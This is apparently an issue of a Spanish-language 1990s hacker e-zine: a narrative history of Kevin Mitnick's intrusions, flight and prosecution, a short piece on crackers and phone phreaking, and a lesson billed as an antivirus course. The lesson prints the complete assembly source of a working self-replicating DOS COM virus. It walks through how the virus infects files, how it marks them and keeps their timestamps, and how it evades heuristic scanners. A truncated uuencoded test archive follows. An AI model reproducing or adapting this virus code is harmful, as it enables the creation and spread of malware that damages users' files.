Un a±o mas tarde fue arrestado de nuevo cuando era estudiante de la
Universidad del Sur de California. En esta ocasion entro ilegalmente a
ARPAnet (la predecesora de Internet) y trato de accesar a la computadora del
Pentagono. Lo sentenciaron a seis meses de carcel en una prision juvenil en
California.

En 1987, luego de tratar de poner su vida en orden, cayo ante la tentacion y
fue acusado, en Santa Cruz California, de invadir el sistema de la compa±ia
Microcorp Systems. Lo sentenciaron a tres a±os de libertad condicional y
luego de la sentencia su expediente desaparecio de la computadora de la
policia local.

Luego busco trabajo en lo que mejor sabia hacer y solicito empleo en el
Security Pacific Bank como encargado de la seguridad de la red del banco. El
banco lo rechazo por sus antecedentes penales y Mitnick falsifico un balance
general del banco donde se mostraban perdidas por 400 millones de dolares y
trato de enviarlo por la red. Afortunadamente el administrador de la red
detuvo el balance antes de que viera la luz.

Ese mismo a±o inicio el escandalo que lo lanzo a la fama. Durante meses
observo secretamente el correo electronico de los miembros del departamento
de seguridad de MCI Communications y Digital Equipment Corporation para
conocer como estaban protegidos las computadoras y el sistema telefonico de
ambas compa±ias.

Luego de recoger suficiente informacion se apodero de 16 codigos de seguridad
de MCI y junto a un amigo, Lenny DiCicco, entraron a la red del laboratorio
de investigaciones de Digital Corporation, conocida como Easynet. Ambos
Hackers querian obtener una copia del prototipo del nuevo sistema operativo
de seguridad de Digital llamado VMS. El personal de seguridad de Digital se
dio cuenta inmediatamente del ataque y dieron aviso al FBI, y comenzaron a
rastrear a los hackers.

Mitnick fue un mal complice y, a pesar de que habian trabajado juntos, trato
de echarle toda la culpa a DiCicco haciendo llamadas anonimas al jefe de
este que trabajaba en una compa±ia de software como tecnico de soporte.
Lleno de rabia y frustracion DiCicco le confeso todo a su jefe que los
denuncio a Digital y al FBI.

Mitnick fue arrestado en 1988 por invadir el sistema de Digital Equipment.
La empresa acuso a Mitnick y a DiCicco ante un juez federal de causarles
da±os por 4 millones de dolares en el robo de su sistema operativo. Fue
declarado culpable de un cargo de fraude en computadoras y de uno por
posesion ilegal de codigos de acceso de larga distancia.

Adicional a la sentencia el fiscal obtuvo una orden de la corte que prohibia
a Mitnick el uso del telefono en la prision alegando que el prisionero podria
obtener acceso a las computadoras a traves de cualquier telefono. A peticion
de Mitnick el juez lo autorizo a llamar unicamente a su abogado, a su esposa,
a su madre y a su abuela y solo bajo supervision de un oficial de la prision.

Este caso produjo revuelo en los Estados Unidos, no solo por el hecho
delictivo sino por la tactica que utilizo la defensa. Su abogado convencio
al juez que Mitnick sufria de una adiccion por las computadoras equivalente
a la de un drogadicto, un alcoholico o un apostador. Gracias a esta maniobra
de la defensa Mitnick fue sentenciado a solo un a±o de prision y al salir de
alli debia seguir un programa de seis meses para tratar su "adiccion a las
computadoras". Durante su tratamiento le fue prohibido tocar una computadora
o un modem y llego a perder mas de 45 kilos.

Para 1991 ya era el Hacker que habia ocupado la primera plana del New York
Times y uno de sus reporteros, John Markoff, decidio escribir un libro de
estilo Cyberpunk narrando las aventuras de Mitnick. Al parecer a Mitnick no
le gusto el libro ya que luego de salir a la venta, la cuenta en Internet
de Markoff fue invadida, cambiando su nivel de acceso, de manera de que
cualquier persona en el mundo conectada a Internet podia ver su correo
electronico.

En 1992, y luego de concluir su programa, Mitnick comenzo a trabajar en una
agencia de detectives. Pronto se descubrio un manejo ilegal en el uso de la
base de datos y fue objeto de una investigacion por parte del FBI quien
determino que habia violado los terminos de su libertad condicional.
Allanaron su casa pero habia desaparecido sin dejar rastro alguno. Ahora
Mitnick se habia convertido en un Hacker profugo.

El fiscal no estaba tan equivocado cuando pidio la restriccion del uso del
telefono. Tambien en 1992, el Departamento de Vehiculos de California
ofrecio una recompensa de 1 millon de dolares a quien arrestara a Mitnick
por haber tratado de obtener una licencia de conducir de manera fraudulenta,
utilizando un codigo de acceso y enviando sus datos via fax.

El Fin

Luego de convertirse en profugo de la justicia cambio de tactica y concluyo
que la mejor manera de no ser rastreado era utilizando telefonos celulares.
De esta manera podria cometer sus fechorias y no estar atado a ningun lugar
fijo. Para ello necesitaba obtener programas que le permitieran moverse con
la misma facilidad con que lo hacia en la red telefonica.

Luego de varios intentos infructuosos, en cuanto a calidad de informacion,
se encontro con la computadora de Tsutomu Shimomura la cual invadio en la
Navidad de 1994. Shimomura, fisico computista y experto en sistemas de
seguridad del San Diego Supercomputer Center, era ademas un muy buen Hacker,
pero era de los "chicos buenos", ya que cuando hallaba una falla de seguridad
en algun sistema lo reportaba a las autoridades, no a otros Hackers.

Shimomura noto que alguien habia invadido su computadora en su ausencia,
utilizando un metodo de intrusion muy sofisticado y que el nunca antes habia
visto. El intruso le habia robado su correo electronico, software para el
control de telefonos celulares y varias herramientas de seguridad en
Internet. Alli comenzo la cuenta regresiva para Mitnick. Shimomura se
propuso como orgullo personal atrapar al Hacker que habia invadido su
privacidad.

Hacia finales de enero de 1995, el software de Shimomura fue hallado en una
cuenta en The Well, un proveedor de Internet en California. Mitnick habia
creado una cuenta fantasma en ese proveedor y desde alli utilizaba las
herramientas de Shimomura para lanzar ataques hacia una docena de
corporaciones de computadoras, entre ellas Motorola, Apple y Qualcomm.

Shimomura se reunio con el gerente de The Well y con un tecnico de Sprint
(proveedor de servicios telefonicos celulares) y descubrieron que Mitnick
habia creado un numero celular fantasma para accesar el sistema. Luego de
dos semanas de rastreos determinaron que las llamadas provenian de Raleigh,
California.

Al llegar Shimomura a Raleigh recibio una llamada del experto en seguridad
de InterNex, otro proveedor de Internet en California. Mitnick habia
invadido otra vez el sistema de InterNex, habia creado una cuenta de nombre
Nancy, borrado una con el nombre Bob y habia cambiado varias claves de
seguridad incluyendo la del experto y la del gerente del sistema que posee
los privilegios mas altos. De igual manera Shimomura tenia informacion sobre
la invasion de Mitcnick a Netcom, una red de base de datos de noticias.

Shimomura se comunico con el FBI y estos enviaron a un grupo de rastreo por
radio. El equipo de rastreo poseia un simulador de celda, un equipo
normalmente utilizado para probar telefonos celulares pero modificado para
rastrear el telefono de Mitnick mientras este esta encendido y aunque no
este en uso. Con este aparato el celular se convertiria en un transmisor sin
que el usuario lo supiera.

A medianoche terminaron de colocar los equipos en una Van y comenzo la
busqueda de la se±al, porque eso era lo que querian localizar; no buscaban a
un hombre porque todas las fotos que tenian eran viejas y no estaban seguros
de su aspecto actual, el objetivo de esa noche era determinar el lugar de
procedencia de la se±al. Ya para la madrugada localizaron la se±al en un
grupo de apartamentos pero no pudieron determinar en cual debido a
interferencias en la se±al.

Mientras esto ocurria la gente de InterNex, The Well y Netcom estaban
preocupados por los movimientos que casi simultaneamente Mitnick hacia en
cada uno de estos sistemas. Cambiaba claves de acceso que el mismo habia
creado y que tenian menos de 12 horas de creadas, utilizando codigos
extra±os e ironicos como no,panix, fukhood y fuckjkt. Estaba creando nuevas
cuentas con mayores niveles de seguridad como si sospechara que lo estaban
vigilando.

El FBI, Shimomura y el equipo de Sprint se habian reunido para planificar la
captura. Shimomura envio un mensaje codificado al buscapersonas del
encargado en Netcom para advertirle que el arresto se iba a realizar al dia
siguiente, 16 de Febrero.
Shimomura envio el mensaje varias veces por equivocacion y el encargado
interpreto que Mitnick ya habia sido arrestado adelantandose a realizar una
copia de respaldo de todo el material que Mitnick habia almacenado en Netcom
como evidencia y borrando las versiones almacenadas por Mitnick. Habia que
realizar el arresto de inmediato, antes de que Mitnick se diera cuenta de
que su informacion habia sido borrada.

Cuando faltaban minutos para dar la orden el simulador de celdas detecto una
nueva se±al de transmision de datos via celular y simultanea a la de
Mitnick, muy cerca de esa zona. Algo extra±o estaba haciendo Mitnick con las
lineas celulares, Shimomura trato de advertirle al agente del FBI pero ya
todo estaba en manos de ellos, Shimomura de ahora en adelante no era mas que
un espectador privilegiado. El FBI no pensaban hacer una entrada violenta
porque no creian que Mitnick estuviera armado, pero tenian que actuar muy
rapido porque sabian el da±o que este hombre podia causar en un solo minuto
con una computadora. Se acercaron lentamente hasta la entrada del apartamento
de Mitnick y anunciaron su presencia, si no les abrian la puerta en cinco
segundos la echarian abajo. Mitnick abrio la puerta con toda calma y el FBI
procedio a arrestarlo y a decomisar todo el material pertinente discos,
computador, telefonos celulares, manuales, etc.

De regreso a su hotel Shimomura decide chequear la contestadora telefonica
de su residencia en San Diego. Se quedo en una pieza cuando escucho la voz
de Mitnick quien le habia dejado varios mensajes con acento oriental en tono
de burla. El ultimo de estos mensajes lo habia recibido ocho horas despues
de que Mitnick habia sido arrestado y antes de que la prensa se hubiera
enterado de todo el asunto. Como se realizo esa llamada aun es un misterio
al igual que el origen y objetivo de la segunda se±al de Mitnick.

Este persistente hacker actualmente esta siendo juzgado y enfrenta dos
cargos federales, uso ilegal de equipos de acceso telefonico y fraude por
computadoras. Puede ser condenado por hasta 35 a±os y a pagar una multa de
hasta medio millon de dolares. Mitnick tambien es sospechoso de robar el
software que las compa±ias telefonicas piensan usar para todo tipo de
procesos, desde la facturacion hasta el seguimiento del origen de una llamada
pasando por la decodificacion de las se±ales de los telefonos celulares para
preservar su privacidad.

                                     El vuelo final

    Todos los cargos bajo los cuales
    ha sido acusado Kevin Mitnick podrian
    suponerle mas de doscientos a±os
    de prision si es declarado culpable

    "No culpable" alcanzo a declararse Kevin Mitnick ante el Gran Jurado de
    California, que el pasado 30 de septiembre lo acuso de 25 cargos por los
    cuales podria ser condenado a mas de doscientos a±os de presidio.

    "Esta acusacion revela el amplio da±o que Mitnick causo mientras era un
    fugitivo de la justicia. Los delitos por computadora permiten a
    sofisticados criminales causar estragos alrededor del mundo usando solo
    una computadora y un modem como sus armas. Queremos con esta acusacion
    dar un paso adelante en los esfuerzos federales por perseguir y capturar
    a los hackers" dijo la fiscal encargada del caso, Nora Manella. Los
    cargos por los que fue acusado Mitnick y su ayudante Lewis Depayne, de
    36 a±os, incluyen el robo de software, fraude electronico, da±o a las
    computadoras de la Universidad del Sur de California, robo de archivos
    electronicos e intercepcion de mensajes de correo electronico. Entre las
    compa±ias afectadas por las actividades del llamado "Condor" se cuentan
    Motorola, Nokia, Fujitsu y Nec.

    Se supone que los da±os causados por Mitnick en los dos a±os y medio
    durante los cuales fue un fugitivo suman millones de dolares,
    especialmente por el software robado y las inversiones que debieron
    realizar las empresas para proteger sus sistemas. El asistente del
    fiscal David Schindler dijo que Mitnick -quien actualmente tiene 33 a±os-
    seria probablemente sentenciado a "muchos a±os" si es encontrado
    culpable, negandose, sin embargo, a ser mas especifico, bajo el argumento
    de que se trata de un area legal muy nueva. Todos los cargos bajo los
    cuales ha sido acusado  Mitnick podrian suponerle mas de doscientos a±os
    de prision si es declarado culpable de todos ellos.

    Ya en abril de este a±o el famoso hacker habia sido declarado culpable
    por un jurado de Carolina del Norte por el uso del quince numeros de
    telefonos celulares robados para llamar a bases de datos electronicas.
    Igualmente se le condeno  por haber violado el regimen de libertad
    condicional al que estaba sometido luego de ser encontrado culpable de
    penetrar ilegalmente en sistemas de informacion de corporaciones de
    informatica.

    Mitnick: hacker, cracker y phone phreaker

    La definicion de un cracker es alguien que trata de violar el acceso a
    un sistema adquiriendo passwords. La mayoria de los crackers son
    adolescentes nada bondadosos y que buscan dar sus golpes destruyendo o
    alterando la data de un sistema. Tienden a unirse en grupos muy peque±os,
    secretos y cerrados al contrario de los inmensos, abierto y
    policulturales hackers.

    Se espera que un verdadero hacker haga algo de crackin jugueton y
    conozca muchas de las tecnicas basicas, pero cualquiera que pase de la
    etapa de larva puede caer en la tentacion y, debido a su creciente deseo
    de realizar algo por razones inmediatas, benignas y practicas, no vea
    nada de malo en invadir cierta seguridad y privacidad para poder lograr
    una meta.

    Para el cracker el invadir un sistema no requiere de misteriosos estados
    de iluminacion mental, pero si mucha persistencia y la testaruda
    repeticion de trucos bien conocidos en los puntos debiles de un sistema,
    tratan de descubrir informacion clasificada hurgando al azar y con ciega
    persistencia.

    Suele decirse que los crackers son solo hackers mediocres y que su nivel
    de educacion e inteligencia sobre un sistema es menor.

    Los phone phreaker son los mas famosos en los medios de comunicacion por
    los desastres que han hecho a traves de los a±os. En los a±os 60 ya
    existian los Phone Phreaks y la gran victima era AT&T. Uno de los mas
    famosos Phone Phreaks de esa epoca era John Draper, alias Captain Crunch
    (http://www.fc.net/phrack.html). El descubrio que modificando una caja
    de cereal podia producir el silbido que simulaba un tono de 2600 Hz para
    desbloquear el acceso a una troncal y poder hacer llamadas
    internacionales gratis.

    Hace algun tiempo el hacer phreaking fue una actividad semi-respetable
    dentro de la comunidad hacker; habia un  acuerdo de caballeros donde el
    hacer phreaking era bien visto como juego intelectual y como una forma
    de exploracion, pero el robo de servicios era tabu. La modernizacion de
    las redes hizo necesario que los phreakers utilizaran tecnicas menos
    eticas, como robar numeros de calling cards: los obtenian colocandose
    cerca de algun telefono publico y memorizando el numero de tarjeta que
    marcaba un usuario descuidado, una vez obtenido el numero y la clave la
    informacion era esparcida de tal manera que en un caso se llegaron a
    realizar 600 llamadas internacionales en dos minutos antes de que los
    operadores de seguridad del sistema la cancelaran.


[email protected]

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]


         µµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµ
         µ segunda parte del curso de antivirus µ
         ╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞


Segundo capítulo: INFECCION APPENDING DE COMS. VIRUS NO RESIDENTE

******************************************************************************
 Disposición Legal:

>   Yo, el autor, declino toda responsabilidad civil y/o legal que discurra
>  de la utilización fraudulenta de esta información. El responsable único
>  y último ser  el lector si decide usarla para dichos fines.

                                                       El autor:
                                                       Manuel Llorens.
******************************************************************************

Bueno, pues aquí tenéis el infector de COMs:

=== ASM Begin 'v020.asm'===
; El presente listado es un virus de 225 bytes. Es capaz de infectar
; COMs que se encuentren en el directorio en el que se ejecuta. Buscar
; hasta encontrar un COM apropiado. No reinfecta. La marca de infección
; es 0fe0h en el último word. No infectar  los archivos protegidos
; contra escritura. Preserva la fecha y la hora del archivo original.
; Para ensamblar: TASM virus, TLINK /t virus
; Patuel

       ;** Longitud del virus **
virLENGTH       equ offset virEND-offset virBEGIN

       ;** Típica plantilla de COM **
C_SEG           segment 'CODE'
               org     100h
assume          cs:C_SEG,ds:C_SEG,es:C_SEG

       ;** Aquí comienza el host, el falso host es NOP, NOP, NOP, INT 20h **
host:           jmp     far ptr entry   ; Saltamos al código vírico

       ;** Aquí vendr  el resto del programa host **
               int     20h

       ;** Aquí comienza el virus en sí **
virBEGIN        label   byte

       ;** Calculamos el δ-offset
entry:          int     68h
               call    near ptr start
start:          pop     bp              ; BP = offset de start
               sub     bp,offset start ; La primera vez obtenemos BP = 0

       ;** Restauramos los 3 primeros bytes del host **
               mov     di,100h         ; Principio del host
               push    di              ; Dejamos 100h en la pila
               lea     si,buffer+bp
               movsw                   ; Ahorramos bytes al no cargar CX
               movsb

       ;** Ahora creamos un nuevo DTA al final del virus **
               mov     ah,1ah          ; Establecer DTA en DS:DX
               lea     dx,virEND+bp
               int     21h

       ;** Buscamos un archivo para infectar **
               mov     ah,4eh          ; Buscar primer archivo que coincida
               lea     dx,path+bp      ; con la cadena en DS:DX
               xor     cx,cx           ; Sólo archivos normales
busqueda:       int     21h             ; (no infectar  los write protected)
               jc      salir           ; salir si hubo error

       ;** Abrimos el archivo que haya encontrado **
               mov     ax,3d02h        ; Abrir fichero en DS:DX el lec/esc
                                       ; En el offset 1eh de la DTA est
                                       ; el nombre del archivo
               lea     dx,virEND+bp+1eh
               int     21h
               jc      salir           ; salir si hubo error
               xchg    bx,ax           ; metemos en BX el handle

       ;** Guardamos los 3 primeros bytes del host **
               mov     ah,3fh          ; Leer CX bytes desde BX hasta DS:DX
               mov     cx,3
               lea     dx,buffer+bp    ; Los metemos en el buffer
               int     21h

       ;** Movemos el puntero al final del fichero **
sigue:          mov     ax,4202h        ; Mover el puntero la cantidad CX:DX
               mov     cx,0ffffh       ; desde el final del archivo
               mov     dx,-2
               int     21h

       ;** Leemos el último word del fichero **
               mov     ah,3fh          ; Leer desde BX hasta DS:DX
               mov     cx,2            ; Leemos 2 bytes
               lea     dx,buffer2+bp   ; Los metemos en el buffer
               int     21h

       ;** Miramos si el archivo ya estaba infectado **
               cmp     word ptr buffer2+bp,0e00fh
               je      otro

       ;** Averiguamos la longitud del archivo **
               mov     ax,4201h        ; Mover el puntero la cantidad CX:DX
               xor     cx,cx           ; desde la posición actual
               xor     dx,dx
               int     21h             ; Nos devuelve en DX:AX la longitud

       ;** Comprobamos si el COM tiene un tamaño 'erróneo' **
               or      dx,dx           ; El COM es demasiado grande
               jne     otro
               cmp     ax,0ffffh-VirLENGTH
               jnb     otro
               cmp     ax,10h          ; El COM es demasiado pequeño
               jb      otro

       ;** Guardamos la longitud del host **
               sub     ax,3            ; Longitud menos salto inicial
               mov     word ptr long+bp,ax

       ;** Añadimos el virus al final del archivo **
               mov     ah,40h          ; Escribir CX bytes desde DS:DX a BX
               mov     cx,VirLENGTH
               lea     dx,VirBEGIN+bp  ; Desde el comienzo del virus
               int     21h

       ;** Movemos el puntero al principio del archivo **
               mov     ax,4200h        ; Mover el puntero la cantidad CX:DX
               xor     cx,cx           ; desde el comienzo del archivo
               xor     dx,dx
               int     21h

       ;** Escribimos el salto **
               mov     ah,40h          ; Escribir CX bytes desde DS:DX a BX
               mov     cx,3
               lea     dx,salto+bp     ; Reconstrucción del salto
               int     21h

       ;** Restauramos la fecha y la hora originales **
               call    fecha

       ;** Cerramos el archivo **
               mov     ah,3eh          ; Cerrar el handle en BX
               int     21h

       ;** Restauramos los registros de segmento **
salir:          mov     ax,cs
               mov     ds,ax
               mov     es,ax

       ;** Volvemos a poner el DTA original **
               mov     ah,1ah          ; Establecer DTA en DS:DX
               mov     dx,80h
               int     21h

       ;** Saltamos a 100h **
               ret

       ;** Cerramos el archivo **
otro:           mov     ah,3eh          ; Cerrar el handle en BX
               int     21h

       ;** Como el arhivo ya estaba infectado buscamos el siguiente **
               mov     ah,4fh          ; Buscar siguiente archivo
               jmp     busqueda

       ;** Restauramos la fecha y la hora que est n aún en el DTA **
fecha:          mov     ax,5701h        ; Establecer fecha y hora de BX
               mov     cx,word ptr [virEND+bp+16h]
               mov     dx,word ptr [virEND+bp+18h]
               int     21h
               ret

       ;** Archivos a buscar en forma de ASCIIZ **
path    db      '*.COM',0
       ;** Reconstrucción del salto que ir  al comienzo del archivo **
salto   db      0e9h
long    dw      ?
       ;** Aquí guardamos los 3 primeros bytes del host **
buffer  db      3 dup(90h)
       ;** Aquí guardamos los 2 últimos bytes del host **
buffer2 db      2 dup(?)
       ;** Marca de archivo infectado **
marca   db      0fh,0e0h
       ;** Aquí termina el virus **
virEND          label   byte

C_SEG           ends
               end     host
=== ASM end 'v020.asm'===

Para todos aquellos para los que este sea el primer contacto con el
listado de un virus, la compresión de este ASM ser  fundamental. Por
ello es muy importante que preguntéis todo lo que no entend is del
mismo. Voy a intentar explicarlo lo mejor posible, pero es un poco
liosillo, así que probad por vuestra cuenta y preguntad ;)

Lo primero que debo aclarar es que el listado de arriba no es el
listado de un virus sino el listado de un programa infectado por el
virus. Esto siempre se hace así cuando se comienza a escribir un virus.
Se crea un archivo host (anfitrión) para el virus lo m s sencillo
posible. En este caso el listado ensamblador del host es:

90h    nop             ; No hacer nada
90h    nop             ; No hacer nada
90h    nop             ; No hacer nada
cd20h  int     20h     ; Salir

Supongamos entonces que teníamos este archivo y que lo hemos infectado
a mano. La infección se produce del siguiente modo:

Sustituimos los 3 primeros bytes del archivo host por un salto al final
del mismo. Añadimos el código vírico al final del archivo. El código
vírico restaura los 3 primeros bytes del host en momoria, ejecuta su
código y devuelve el control al host. De este modo el host no se entera
de que est  infectado, dado que se ejecuta sin 'molestia'. La única
excepción a esta regla supone que el COM se abra a sí mismo como archivo
para leer datos y que lo haga leyendo desde una posición relativa al final
del fichero, eso o que el COM se autochequee. Esto lo podemos evitar
mediante un virus stealth, pero eso lo dejamos para el final del
capítulo ;)

Vamos paso por paso a ver qué es lo que hace el virus.

Lo primero que tenemos en el listado es el salto al código vírico.
Estamos viendo el listado de un programa infectado, así que los tres
bytes que pertenecían al host est n guardados en 'buffer' (90,90,90h)
con el fin de poder restaurarlos m s adelante.

El 'jmp' salta hasta el código vírico, que comienza en 'entry'. Todo lo
que queda entre ambas direcciones es parte del host y no lo tocamos para
nada. Como se puede comprender r pidamente, la dirección de 'entry'
cambiar  según lo grande que sea el host. Así que lo siguiente que
hacemos es averiguar cual es esa dirección. Esto es necesario dado que
los offsets de las variables que usa el virus ('buffer' por ejemplo) los
ha calculado el ensamblador respecto al host de 5 bytes, pero cuando el
host sea mayor las variables tendr n offsets mayores, tanto mayores
cuanto mayor sea el host. Para eso hacemos el call que comienza en
entry (olvidaros del int 68h de momento).

tenemos esto:

entry:         call    near ptr start
start:         pop     bp
               sub     bp,offset start

Como todos sabéis el call salta a start dejando en la pila la dirección
(sólo el offset por ser un salto near) de la instrucción siguiente al
call, que en este caso es el propio start. De ese modo cuando hacemos el
pop obtenemos en bp el offset real de start y dejamos la pila 'limpia'
A continuación le restamos el offset de start en el momento de la
compilación. De ese modo si estamos ejecutando este listado ambos
offsets ser n iguales y bp ser  0. Este valor de bp es lo que se conoce
como δ-offset. Cuando el host sea mayor el valor obtenido mediante el
pop ser  mayor, pero lo que le restamos sigue siendo un valor fijo. Como
es un proceso algo complicadillo vamos a verlo m s en detalle:

0105   e80000   call   0108    (deja 0108 en la pila)
0108   5d       pop    bp      (bp=0108)
0109   81ed0301 sub    bp,108  (bp=0)

En un host diferente:

0205   e80000   call   0208    (deja 0208 en la pila)
0208   5d       pop    bp      (bp=0208)
0209   81ed0301 sub    bp,108  (bp=0100)

Es decir, 100h es la diferencia de bytes entre ambos hosts, y es lo que
ha aumentado el offset de las variables internas del virus ;)

A partir de ese punto todas las variables del virus las deberemos usar
de la forma variable+bp.

Resumiendo, hasta aquí tenemos lo siguiente:

                ┌─  salto                ┌─> inicio del host
             A) │   resto del host    B) │   resto del host
                └─> código vírico        └─  Código vírico

Vamos a continuar con el código del virus. Como al final del código
vírico tendremos que saltar a la dirección 100h (comienzo del código
ejecutable). Para ello dejamos 100h en la pila y al final de virus
hacemos un simple ret. Es una forma de despistar a algunos antivirus
heurísticos, de modo que no crean que el virus devuelve el control al
host. Esto lo hacemos mediante:

        mov    di,100h
        push   di

Ahora restauramos los 3 primeros bytes del host (en memoria). Para ello
como DS y ES ya los tenemos cargados y di es justo 100h porque lo
acabamos de cargar sólo tenemos que cargar SI con el offset de buffer:

       lea     si,buffer+sp

y restauramos los tres bytes con

       movsw   word ptr DS:SI -> word ptr ES:DI SI=SI+2, DI=DI+2
       movsb   byte ptr DS:SI -> byte ptr ES:DI SI=SI+1, DI=DI+1

Si ahora pusiésemos un ret el virus no haría nada, pero funcionaría
perfectamente. Así que ahora pasamos al código realmente reproductivo.

Lo que viene a continuación involucra al DTA, así que vamos a ver el
DTA en detalle. El DTA es una estructura que por defecto se sitúa a
partir del offset 80h del segmento del PSP. Es decir si el COM comienza
en 100h pues est  en los 20h bytes anteriores. Esta localización
presenta un problemas y es que es la misma que utiliza el DOS para pasar
al COM los par metros que se hayan especificado desde la línea de
comandos. Esto es un problema pues si usamos la DTA por defecto nos
estaremos cargando los par metros y si el host los necesita no los
encontrar ... para ello necesitamos crear otro DTA en una localización
distinta. En este caso lo situaremos al final del virus. Para ello
tenemos una función del DOS:

        mov    ah,1ag
        lea    dx,virEND+bp
        int    21h

Esto hace que el nuevo DTA sea el indicado por DS:DX. DX lo cargamos
con el final del virus y DS ya est  cargado (lo hace el DOS al pasar el
control al host y nosotros no lo hemos tocado).

Ahora que tenemos una DTA segura veamos su estructura:

=== TXT begin 'DTA' ===
HelpPC 2.10           Quick Reference Utility     Copyright 1991 David Jurgens

          DTA - Disk Transfer Area  (partially undocumented)

       DTA contains data, of which the first 21 bytes (00-15h) are known
       as being "reserved for DOS use on subsequent find next calls"

     Offset Size          Description

       00   byte       attribute of search (undocumented)
       01   byte       drive used in search  (undocumented)
       02  11bytes     search name used (undocumented)
       0D   word       directory entry number (0 based, DOS 3.x+, undoc.)
       0F   word       starting cluster number of current directory
                       zero for root directory (DOS 3.x+, undocumented)
       11   word       reserved (undocumented)
       13   word       starting cluster number of current directory
                       zero for root directory (DOS 2.x+, undocumented)
       15   byte       attribute of matching file
       16   word       file time  (see FILE ATTRIBUTES)
       18   word       file date  (see FILE ATTRIBUTES)
       1A   word       file size
       1E 13bytes      ASCIIZ filename and extension in the form NAME.EXT
                       with blanks stripped


       - fields of DTA change dependent upon function call in progress
       - the DTA cannot span a 64K segment boundary
       - for compatibility with CP/M the default DTA is at offset 80h
         in the PSP;  this area is also used for the command tail. To
         avoid collision, set another DTA (INT 21,1A) or preserve the
         command tail before using FCB function calls
=== TXT end 'DTA' ===

A nostros sólo nos va a interesar los offsets 16, 18 y 1e que son la
hora, la fecha y el nombre del fichero respectivamente. Vamos a seguir
con el virus que m s adelante vermos cómo usar estos offsets.
(El offset 15 que contiene los atributos también es interesante si
queremos preservarlos, pero como este virus no los cambia no ser
necesario).

Ahora le decimos al DOS que nos busque el primer '*.COM' que encuentre
en el directorio actual. Para ello llamamos a la función del DOS que
cumple ese cometido:

               mov     ah,4ah
               lea     dx,path+bp
               xor     cx,cx
busqueda:       int     21h
               jc      salir

Esta función nos devolver  el carry a uno si no encuentra ningún
fichero que coincida con la descripción. Si lo encuentre devolver  su
nombre en el offset 1eh del DTA (junto con el resto de los datos en los
respectivos campos). M s adelante si este archivo no nos satisface
(porque ya esté infectado por ejemplo) le pediremos al DOS que nos
busque el siguiente archivo que coincida con la descripción. En este
caso la función a llamar es la 4fh y el proceso es similar, salvo que no
tenemos que decirle el '*.COM' porque el DOS ya lo sabe de antes, de
hecho lo ha guardado en el DTA (offset 02h). Esa es la explicación del
precedimiento 'otro':

otro:           'Cerramos el fichero'
               mov     ah,4fh
               jmp     busqueda

Pero antes de decirle que busque otro debemos ver si el archivo que nos
ha pasado el DOS nos satisface. Para ello vemos antes de nada si ya
estaba infectado. Lo cierto es que el virus (por el modo en que est
construido) seguiría funcionando perfectamente aunque un archivo se
infectase numerosas veces, pero con cada infección su ejecución sería
m s y m s lenta, y el archivo m s y m s grande, de ahí que lo mejor sea
evitar múltiples infecciones. Para saber si un archivo est  infectado
acabamos el código vírico en la palabra '0fe0h' (es un virus con
complejos ;) Si el archivo que estamos intentando infectar ya acaba de
ese modo no lo infectamos y llamamos a otro, en caso contrario seguimos.

Antes de eso tenemos que abrir el archivo en lectura/escritura, guardar
los 3 primeros bytes del archivo a infectar, mover el puntero al final
del archivo y leemos finalmente esos dos últimos bytes. Como esta parte
es muy f cil no la detallo, si tenéis dudas preguntadlo. Pero la verdad
es que con conocer bien la descripción de cada servicio del DOS del que
hace uso el virus es muy f cil seguirle la pista. Los que quer is tener
una buena descripción os recomiendo las Ralph Brown o el HelpPC ;)

Es MUY importante copiar los 3 primeros bytes del host antes de la
infección ya que el virus que va a reproducirse es el que est  en
memoria y si no lo copiamos antes el virus que se copiar  tendr  los
tres primeros bytes del host actual, no del host que estamos
infectando... :))

Comparamos pues los dos últimos bytes:

       cmp     word ptr buffer2+bp,0e00fh
       je      otro

Si el virus no estaba infectado averiguamos su tamaño. Podemos leerlo
del DTA o pedirle al DOS que nos lo diga, pero ya que tenemos el archivo
abierto y el puntero al final del archivo (lo teniamos al final -2, pero
al leer esos dos bytes se ha quedado al final) tenemos el tamaño del
virus en DX:AX (el servicio del DOS que mueve el puntero trabaja de ese
modo). Si DX no es 0 entonces el COM ocupa m s de un segmento y no lo
infectamos, si el tamaño del host m s el del virus es mayor de un
segmento tampoco lo infectamos y finalmente si el virus es demasiado
pequeño tampoco (así adem s evitamos infectar archivos trampa).

En caso de que el archivo cumpla con todos los requisitos pasamos a la
infección propiamente dicha.

Para ello ya que estamos al final del archivo a infectar lo que hacemos
es añadir primero el virus. Antes guardamos el tamaño del virus -3 ya
que es esta la cantidad que tendr  que saltar el salto que luego
pondremos al principio del nuevo host. Como hemos marcado bien desde el
comienzo el principio, el final y el tamaño del virus, el proceso es muy
sencillo:

       mov     ah,40h
       mov     cx,VirLENGTH
       lea     dx,VirBEGIN
       int     21h

Ahora movemos el puntero de nuevo al comienzo del virus y escribimos el
salto. Para ello hemos preparado ya una copia exacta del salto en las
variables de final del código vírico:

salto   db      0e9h    opcode de salto near (no relativo)
long    dw      ?

Una vez que hemos copiado el salto (siguiendo idéntico procedimiento al
usado para añadir al final el virus) ponemos la fecha que estaba antes
usando un servicio del DOS y tomando los datos del DTA.

Cerramos el archivo y reponemos los registros DS y ES. Esto no sería
necesario dado que este virus no cambia en ningún momento esos datos,
pero es muy probable que si modific is el virus incluy is servicios del
DOS que sí los modifiquen (por ejemplo instalar un gestor de la int 24h
para que el virus no de error al intentar escribir en un disco protegido
contra escritura), y para que no se os olvide lo he puesto. Finalmente
restauramos el DTA antiguo (no hemos guardado su dirección anterior,
pero sabemos que por defecto est  situado en 80h):

       mov     ah,1ah
       mov     dx,80h
       int     21h

y finalizamos con el ret (queda 100h en la pila) ;)

Bueno, pues eso es todo lo que hace el virus. Como podréis comprobar se
reproduce correctamente y los archivos infectados siguen ejecut ndose
perfectamente. Para que pod is practicar os adjunto un host de prueba y
un programilla para ver los cambios que el virus hace en dicho archivo.

=== UUENCODE begin 'utils.zip' ===
begin 644 utils.zip
M4$L#!!0``@`(``^&X2#U.L>=*@```*4%```(````0T%:02Y#3TWMS#$-`$`(
M1;&=!`\G"0N0G`$29.()$W]\2\?N,[?H^94J^?CX^/A4WP%02P,$%``"``@`
